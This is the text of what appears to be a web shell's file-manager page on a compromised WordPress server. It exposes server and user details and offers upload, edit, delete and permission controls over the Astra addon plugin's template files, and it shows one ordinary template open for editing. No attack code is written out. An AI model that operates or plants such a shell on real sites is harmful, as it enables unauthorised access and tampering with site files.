[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
astra-addon
/
addons
/
header-sections
/
template
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 above-header-layout-1.php
1,916 B
SET
[ EDIT ]
|
[ DEL ]
📄 above-header-layout-2.php
1,331 B
SET
[ EDIT ]
|
[ DEL ]
📄 below-header-layout-1.php
697 B
SET
[ EDIT ]
|
[ DEL ]
📄 below-header-layout-2.php
581 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
117 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: below-header-layout-1.php
<?php /** * Below Header Layout 2 * * Inline Layout * * @package Astra Addon */ ?> <div class="ast-below-header-wrap ast-below-header-1"> <div class="ast-below-header"> <?php do_action( 'astra_below_header_top' ); ?> <div class="ast-container"> <div class="ast-flex ast-below-header-section-wrap"> <?php Astra_Ext_Header_Sections_Markup::get_below_header_section( 'below-header-section-1', 'below-header-1' ); ?> <?php Astra_Ext_Header_Sections_Markup::get_below_header_section( 'below-header-section-2', 'below-header-1' ); ?> </div> </div> <?php do_action( 'astra_below_header_bottom' ); ?> </div><!-- .ast-below-header --> </div><!-- .ast-below-header-wrap -->